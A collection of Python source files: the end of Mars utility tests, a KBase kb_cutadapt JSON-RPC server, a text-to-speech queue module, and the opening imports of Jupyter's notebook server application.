assert utils.tokenize(f) == utils.tokenize(copy.deepcopy(f))
partial_f = partial(f, 1, k=0)
partial_f2 = partial(f, 1, k=1)
assert utils.tokenize(partial_f) == utils.tokenize(copy.deepcopy(partial_f))
assert utils.tokenize(partial_f) != utils.tokenize(partial_f2)
def test_lazy_import():
old_sys_path = sys.path
mock_mod = textwrap.dedent(
"""
__version__ = '0.1.0b1'
""".strip()
)
temp_dir = tempfile.mkdtemp(prefix="mars-utils-test-")
sys.path += [temp_dir]
try:
with open(os.path.join(temp_dir, "test_mod.py"), "w") as outf:
outf.write(mock_mod)
non_exist_mod = utils.lazy_import("non_exist_mod", locals=locals())
assert non_exist_mod is None
mod = utils.lazy_import(
"test_mod", globals=globals(), locals=locals(), rename="mod"
)
assert mod is not None
assert mod.__version__ == "0.1.0b1"
glob = globals().copy()
mod = utils.lazy_import("test_mod", globals=glob, locals=locals(), rename="mod")
glob["mod"] = mod
assert mod is not None
assert mod.__version__ == "0.1.0b1"
assert type(glob["mod"]).__name__ == "module"
finally:
shutil.rmtree(temp_dir)
sys.path = old_sys_path
def test_chunks_indexer():
a = mt.ones((3, 4, 5), chunk_size=2)
a = tile(a)
assert a.chunk_shape == (2, 2, 3)
with pytest.raises(ValueError):
_ = a.cix[1]
with pytest.raises(ValueError):
_ = a.cix[1, :]
chunk_key = a.cix[0, 0, 0].key
expected = a.chunks[0].key
assert chunk_key == expected
# as chunks[9] and chunks[10] share the same shape,
# their keys should be equal.
chunk_key = a.cix[1, 1, 1].key
expected = a.chunks[9].key
assert chunk_key == expected
chunk_key = a.cix[1, 1, 2].key
expected = a.chunks[11].key
assert chunk_key == expected
chunk_key = a.cix[0, -1, -1].key
expected = a.chunks[5].key
assert chunk_key == expected
chunk_key = a.cix[0, -1, -1].key
expected = a.chunks[5].key
assert chunk_key == expected
chunk_keys = [c.key for c in a.cix[0, 0, :]]
expected = [c.key for c in [a.cix[0, 0, 0], a.cix[0, 0, 1], a.cix[0, 0, 2]]]
assert chunk_keys == expected
chunk_keys = [c.key for c in a.cix[:, 0, :]]
expected = [
c.key
for c in [
a.cix[0, 0, 0],
a.cix[0, 0, 1],
a.cix[0, 0, 2],
a.cix[1, 0, 0],
a.cix[1, 0, 1],
a.cix[1, 0, 2],
]
]
assert chunk_keys == expected
chunk_keys = [c.key for c in a.cix[:, :, :]]
expected = [c.key for c in a.chunks]
assert chunk_keys == expected
def test_insert_reversed_tuple():
assert utils.insert_reversed_tuple((), 9) == (9,)
assert utils.insert_reversed_tuple((7, 4, 3, 1), 9) == (9, 7, 4, 3, 1)
assert utils.insert_reversed_tuple((7, 4, 3, 1), 6) == (7, 6, 4, 3, 1)
assert utils.insert_reversed_tuple((7, 4, 3, 1), 4) == (7, 4, 3, 1)
assert utils.insert_reversed_tuple((7, 4, 3, 1), 0) == (7, 4, 3, 1, 0)
def test_require_not_none():
@utils.require_not_none(1)
def should_exist():
pass
assert should_exist is not None
@utils.require_not_none(None)
def should_not_exist():
pass
assert should_not_exist is None
@utils.require_module("numpy.fft")
def should_exist_np():
pass
assert should_exist_np is not None
@utils.require_module("numpy.fft_error")
def should_not_exist_np():
pass
assert should_not_exist_np is None
def test_type_dispatcher():
dispatcher = utils.TypeDispatcher()
type1 = type("Type1", (), {})
type2 = type("Type2", (type1,), {})
type3 = type("Type3", (), {})
dispatcher.register(object, lambda x: "Object")
dispatcher.register(type1, lambda x: "Type1")
dispatcher.register("pandas.DataFrame", lambda x: "DataFrame")
assert "Type1" == dispatcher(type2())
assert "DataFrame" == dispatcher(pd.DataFrame())
assert "Object" == dispatcher(type3())
dispatcher.unregister(object)
with pytest.raises(KeyError):
dispatcher(type3())
def test_fixed_size_file_object():
arr = [str(i).encode() * 20 for i in range(10)]
bts = os.linesep.encode().join(arr)
bio = BytesIO(bts)
ref_bio = BytesIO(bio.read(100))
bio.seek(0)
ref_bio.seek(0)
fix_bio = utils.FixedSizeFileObject(bio, 100)
assert ref_bio.readline() == fix_bio.readline()
assert ref_bio.tell() == fix_bio.tell()
pos = ref_bio.tell() + 10
assert ref_bio.seek(pos) == fix_bio.seek(pos)
assert ref_bio.read(5) == fix_bio.read(5)
assert ref_bio.readlines(25) == fix_bio.readlines(25)
assert list(ref_bio) == list(fix_bio)
def test_timer():
with utils.Timer() as timer:
time.sleep(0.1)
assert timer.duration >= 0.1
def test_quiet_stdio():
old_stdout, old_stderr = sys.stdout, sys.stderr
class _IOWrapper:
def __init__(self, name=None):
self.name = name
self.content = ""
@staticmethod
def writable():
return True
def write(self, d):
self.content += d
return len(d)
stdout_w = _IOWrapper("stdout")
stderr_w = _IOWrapper("stderr")
executor = ThreadPoolExecutor(1)
try:
sys.stdout = stdout_w
sys.stderr = stderr_w
with utils.quiet_stdio():
with utils.quiet_stdio():
assert sys.stdout.writable()
assert sys.stderr.writable()
print("LINE 1", end="\n")
print("LINE 2", file=sys.stderr, end="\n")
executor.submit(print, "LINE T").result()
print("LINE 3", end="\n")
print("LINE 1", end="\n")
print("LINE 2", file=sys.stderr, end="\n")
finally:
sys.stdout, sys.stderr = old_stdout, old_stderr
assert stdout_w.content == "LINE T\nLINE 1\n"
assert stderr_w.content == "LINE 2\n"
@pytest.mark.asyncio
@pytest.mark.skipif(
sys.version_info[:2] < (3, 7),
reason="asyncio task timeout detector is not supported on python versions below 3.7",
)
async def test_asyncio_task_timeout_detector():
log_file_name = "test_asyncio_task_timeout_detector.log"
try:
os.environ["MARS_DEBUG_ASYNCIO_TASK_TIMEOUT_CHECK_INTERVAL"] = "1"
p = multiprocessing.Process(
target=_run_task_timeout_detector, args=(log_file_name,)
)
p.start()
while p.is_alive():
await asyncio.sleep(0.1)
with open(log_file_name, "r") as f:
detector_log = f.read()
assert "timeout_func" in detector_log
finally:
os.environ.pop("MARS_DEBUG_ASYNCIO_TASK_TIMEOUT_CHECK_INTERVAL")
if os.path.exists(log_file_name):
os.remove(log_file_name)
def _run_task_timeout_detector(log_file_name):
from ..utils import logger, register_asyncio_task_timeout_detector
fh = logging.FileHandler(log_file_name)
fh.setLevel(logging.INFO)
logger.addHandler(fh)
async def timeout_func():
await asyncio.sleep(2)
async def main():
task = register_asyncio_task_timeout_detector()
await asyncio.create_task(timeout_func())
task.cancel()
asyncio.run(main())
def test_module_placeholder():
required_module = utils.ModulePlaceholder("required_module")
with pytest.raises(AttributeError):
required_module()
with pytest.raises(AttributeError) as e:
required_module.method()
msg = e.value.args[0]
assert msg == "required_module is required but not installed."
def test_merge_dict():
from ..utils import merge_dict
assert merge_dict({}, {1: 2}) == {1: 2}
assert merge_dict({1: 2}, {}) == {1: 2}
assert (
merge_dict(
{"a": {1: 2}, "b": {2: 3}, "c": {1: {2: 3}}},
{"a": {1: 3}, "b": {2: 3}, "c": {1: {2: 4}}},
)
== {"a": {1: 3}, "b": {2: 3}, "c": {1: {2: 4}}}
)
with pytest.raises(ValueError):
merge_dict({"a": {1: 2}, "b": {2: 3}}, {"a": {1: 3}}, overwrite=False)
def test_flatten_dict_to_nested_dict():
from ..utils import flatten_dict_to_nested_dict
assert flatten_dict_to_nested_dict({}) == {}
with pytest.raises(ValueError):
flatten_dict_to_nested_dict({"a.b.c": 1, "a.b": 2})
assert flatten_dict_to_nested_dict({"a.b.c": 1, "a.b.d": 2}) == {
"a": {"b": {"c": 1, "d": 2}}
}
def test_readable_size():
assert utils.readable_size(32) == "32.00"
assert utils.readable_size(14354) == "14.02K"
assert utils.readable_size(14354000) == "13.69M"
assert utils.readable_size(14354000000) == "13.37G"
assert utils.readable_size(14354000000000) == "13.05T"
def test_estimate_pandas_size():
df1 = pd.DataFrame(np.random.rand(50, 10))
assert utils.estimate_pandas_size(df1) == sys.getsizeof(df1)
df2 = pd.DataFrame(np.random.rand(1000, 10))
assert utils.estimate_pandas_size(df2) == sys.getsizeof(df2)
df3 = pd.DataFrame(
{
"A": np.random.choice(["abcd", "def", "gh"], size=(1000,)),
"B": np.random.rand(1000),
"C": np.random.rand(1000),
}
)
assert utils.estimate_pandas_size(df3) != sys.getsizeof(df3)
s1 = pd.Series(np.random.rand(1000))
assert utils.estimate_pandas_size(s1) == sys.getsizeof(s1)
from ..dataframe.arrays import ArrowStringArray
array = ArrowStringArray(np.random.choice(["abcd", "def", "gh"], size=(1000,)))
s2 = pd.Series(array)
assert utils.estimate_pandas_size(s2) == sys.getsizeof(s2)
s3 = pd.Series(np.random.choice(["abcd", "def", "gh"], size=(1000,)))
assert utils.estimate_pandas_size(s3) != sys.getsizeof(s3)
idx1 = pd.MultiIndex.from_arrays(
[np.arange(0, 1000), np.random.choice(["abcd", "def", "gh"], size=(1000,))]
)
assert utils.estimate_pandas_size(idx1) != sys.getsizeof(idx1)
@require_ray
def test_web_serialize_lambda():
register_ray_serializers()
df = md.DataFrame(
mt.random.rand(10_0000, 4, chunk_size=1_0000), columns=list("abcd")
)
r = df.apply(lambda x: x)
graph = TileableGraph([r])
s = utils.serialize_serializable(graph)
f = utils.deserialize_serializable(s)
assert isinstance(f, TileableGraph)
|
kb_cutadaptServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_cutadapt.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_cutadapt'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_cutadapt.kb_cutadaptImpl import kb_cutadapt # noqa @IgnorePep8
impl_kb_cutadapt = kb_cutadapt(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is the same as call() except that the return value is a Python
object instead of a JSON string. It is mainly useful for debugging
purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
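# A minimal sketch (not taken from the kb_cutadapt spec; field values are
# illustrative) of the single-request payload that call_py() above accepts,
# mirroring how process_async_cli() further down builds its requests, with ctx
# a MethodContext as constructed there:
#
#     req = {
#         'version': '1.1',
#         'id': '12345',
#         'method': 'kb_cutadapt.remove_adapters',
#         'params': [{}],   # positional params; keyword params need jsonrpc >= 1.1
#     }
#     result = application.rpc_service.call_py(ctx, req)
#
# A non-empty list of such dicts is handled as a batch, and notifications
# (requests whose 'id' is None) produce no response.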
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
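# A worked illustration of getIPAddress() (header values are hypothetical): with
# dont_trust_x_ip_headers unset, a request carrying
# "X-Forwarded-For: 10.0.0.5, 192.168.1.1" resolves to '10.0.0.5'; with
# dont_trust_x_ip_headers set to 'true' in the config, REMOTE_ADDR is used instead.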
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_cutadapt'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_cutadapt.remove_adapters,
name='kb_cutadapt.remove_adapters',
types=[dict])
self.method_authentication['kb_cutadapt.remove_adapters'] = 'required' # noqa
self.rpc_service.add(impl_kb_cutadapt.exec_remove_adapters,
name='kb_cutadapt.exec_remove_adapters',
types=[dict])
self.method_authentication['kb_cutadapt.exec_remove_adapters'] = 'required' # noqa
self.rpc_service.add(impl_kb_cutadapt.exec_remove_adapters_OneLibrary,
name='kb_cutadapt.exec_remove_adapters_OneLibrary',
types=[dict])
self.method_authentication['kb_cutadapt.exec_remove_adapters_OneLibrary'] = 'required' # noqa
self.rpc_service.add(impl_kb_cutadapt.status,
name='kb_cutadapt.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_cutadapt ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP server listening
# on port 9999 (the default), execute this file directly
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, starts the server on localhost on a system-assigned port in
the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
also allows the assigned port number to be returned.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
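# A minimal usage sketch (an assumption about typical use, not taken from the
# KBase SDK docs): run the service in a child process so stop_server() can be
# called later, then point a JSON-RPC client at the returned port.
#
#     port = start_server(newprocess=True)   # child process; port is returned
#     # ... POST JSON-RPC requests to http://localhost:<port>/ ...
#     stop_server()                          # terminates the child process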
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
tts.py
|
from __future__ import annotations
import threading
import time
from queue import Queue
from typing import Callable, List, Tuple
import accessible_output2.outputs.auto
from .log import exception
class _TTS:
_end_time = None
def __init__(self, wait_delay_per_character):
self.o = accessible_output2.outputs.auto.Auto()
self._wait_delay_per_character = wait_delay_per_character
def IsSpeaking(self):
if self._end_time is None:
return False
else:
return self._end_time > time.time()
def Speak(self, text):
self.o.output(text, interrupt=True)
self._end_time = time.time() + len(text) * self._wait_delay_per_character
def Stop(self):
self.o.output("", interrupt=True)
self._end_time = None
_tts = None
_is_speaking = False
_queue: Queue[Tuple[Callable, List]] = Queue()
def is_speaking():
return _is_speaking
def _speak(text):
with _lock:
try:
_tts.Speak(text)
except:
exception("error during _tts.Speak('%s')", text)
def speak(text: str):
global _is_speaking
assert isinstance(text, str)
_queue.put((_speak, [text]))
_is_speaking = True
def _stop():
with _lock:
if _is_speaking:
try:
_tts.Stop()
except:
pass # speak() will have a similar error and fall back to sounds
def stop():
global _is_speaking
_queue.put((_stop, []))
_is_speaking = False
def _init_com_for_this_thread():
try:
import pythoncom
except ImportError:
pass
else:
pythoncom.CoInitialize()
def _loop():
_init_com_for_this_thread()
while True:
cmd, args = _queue.get()
if not _queue.empty():
# print("skipped!", cmd, args)
continue
try:
cmd(*args)
except:
exception("")
def _loop2():
# assertion: this thread never uses COM
# no need to call _init_com_for_this_thread()
global _is_speaking
while True:
if _is_speaking:
time.sleep(0.1)
with _lock:
if not _tts.IsSpeaking():
_is_speaking = False
time.sleep(0.1)
def init(wait_delay_per_character):
global _tts, _lock
_lock = threading.Lock()
_tts = _TTS(wait_delay_per_character)
t = threading.Thread(target=_loop)
t.daemon = True
t.start()
t = threading.Thread(target=_loop2)
t.daemon = True
t.start()
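# A minimal usage sketch (assumes an accessible_output2 backend is available on
# this system): init() must be called once to create the lock, the _TTS instance
# and the two worker threads before speak()/stop() are used.
#
#     init(wait_delay_per_character=0.05)
#     speak("hello world")        # queued; the _loop thread performs the output
#     while is_speaking():
#         time.sleep(0.05)
#     stop()                      # interrupts any speech still in progress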
|
notebookapp.py
|
"""A tornado based Jupyter notebook server."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import notebook
import asyncio
import binascii
import datetime
import errno
import functools
import gettext
import hashlib
import hmac
import importlib
import inspect
import io
import ipaddress
import json
import logging
import mimetypes
import os
import random
import re
import select
import signal
import socket
import stat
import sys
import tempfile
import threading
import time
import warnings
import webbrowser
try:
import resource
except ImportError:
# Windows
resource = None
from base64 import encodebytes
from jinja2 import Environment, FileSystemLoader
from notebook.transutils import trans, _
# check for a sufficiently recent tornado (>= 5.0)
try:
import tornado
except ImportError as e:
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0")) from e
try:
version_info = tornado.version_info
except AttributeError as e:
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0, but you have < 1.1.0")) from e
if version_info < (5,0):
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0, but you have %s") % tornado.version)
from tornado import httpserver
from tornado import ioloop
from tornado import web
from tornado.httputil import url_concat
from tornado.log import LogFormatter, app_log, access_log, gen_log
if not sys.platform.startswith('win'):
from tornado.netutil import bind_unix_socket
from notebook import (
DEFAULT_NOTEBOOK_PORT,
DEFAULT_STATIC_FILES_PATH,
DEFAULT_TEMPLATE_PATH_LIST,
__version__,
)
from .base.handlers import Template404, RedirectWithParams
from .log import log_request
from .services.kernels.kernelmanager import MappingKernelManager, AsyncMappingKernelManager
from .services.config import ConfigManager
from .services.contents.manager import ContentsManager
from .services.contents.filemanager import FileContentsManager
from .services.contents.largefilemanager import LargeFileManager
from .services.sessions.sessionmanager import SessionManager
from .gateway.managers import GatewayKernelManager, GatewayKernelSpecManager, GatewaySessionManager, GatewayClient
from .auth.login import LoginHandler
from .auth.logout import LogoutHandler
from .base.handlers import FileFindHandler
from traitlets.config import Config
from traitlets.config.application import catch_config_error, boolean_flag
from jupyter_core.application import (
JupyterApp, base_flags, base_aliases,
)
from jupyter_core.paths import jupyter_config_path
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_client.session import Session
from nbformat.sign import NotebookNotary
from traitlets import (
Any, Dict, Unicode, Integer, List, Bool, Bytes, Instance,
TraitError, Type, Float, observe, default, validate
)
from ipython_genutils import py3compat
from jupyter_core.paths import jupyter_runtime_dir, jupyter_path
from notebook._sysinfo import get_sys_info
from ._tz import utcnow, utcfromtimestamp
from .utils import (
check_pid,
pathname2url,
run_sync,
unix_socket_in_use,
url_escape,
url_path_join,
urldecode_unix_socket_path,
urlencode_unix_socket,
urlencode_unix_socket_path,
urljoin,
)
from .traittypes import TypeFromClasses
# Check if we can use async kernel management
try:
from jupyter_client import AsyncMultiKernelManager
async_kernel_mgmt_available = True
except ImportError:
async_kernel_mgmt_available = False
# Tolerate missing terminado package.
try:
from .terminal import TerminalManager
terminado_available = True
except ImportError:
terminado_available = False
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
